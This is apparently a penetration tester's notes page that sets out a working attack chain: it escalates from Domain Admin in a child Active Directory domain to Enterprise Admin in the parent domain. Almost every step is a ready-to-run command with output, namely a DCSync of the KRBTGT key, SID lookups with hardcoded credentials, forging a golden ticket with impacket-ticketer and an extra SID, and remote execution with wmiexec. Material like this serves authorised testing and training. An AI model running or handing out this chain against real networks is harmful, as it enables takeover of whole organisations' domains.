Example attack: Impacket-Ticketer

Requesting tickets from Kali

In this example we have DA in internal.zsm.local, there is trust with it's parent zsm.local. We will abuse this trust to also get DA in zsm.local.

Attack

(we do this with powerview on the compromised DC in internal.zsm.local)

Collect the AESkey of the KRBTGT using DCSYNC (secretsdump) from internal.zsm.local:

3bdcbeb0910e5887e6d...e099322ac91cc386ca296a5c5497b0

Get SID of internal.zsm.local:

Get-DomainSID -Domain internal.zsm.local
S-1-5-21-3056178012-3972705859-491075245

Get SID of zsm.local, note that we pass low-priv credentials for zsm.local:

$SecPassword = ConvertTo-SecureString 'Pass123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\Marcus', $SecPassword)
Get-DomainSID -Domain zsm.local -Credential $Cred
S-1-5-21-2734290894-461713716-141835440

We now have everything we need to execute the attack, note that we pass the user 'Laura' who is a Domain Admin in internal.zsm.local:

Dont forget to add -519 to extra-sid, this is the static SID for Enterprise Admins

impacket-ticketer -aesKey 3bdcbeb0910e5887e6d...e099322ac91cc386ca296a5c5497b0 -domain-sid S-1-5-21-3056178012-3972705859-491075245 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-141835440-519 Laura -user-id 6602

Load the ccache in Kali:

export KRB5CCNAME=Laura.ccache

Add the necessary entries in /etc/hosts:

192.168.210.10 zsm.local ZPH-SVRDC01.zsm.local
192.168.210.16 internal.zsm.local ZPH-SVRCDC01.internal.zsm.local

Can now access zsm.local with kerberos auth:

impacket-wmiexec -k -no-pass internal.zsm.local/[email protected]

Last updated 1 year ago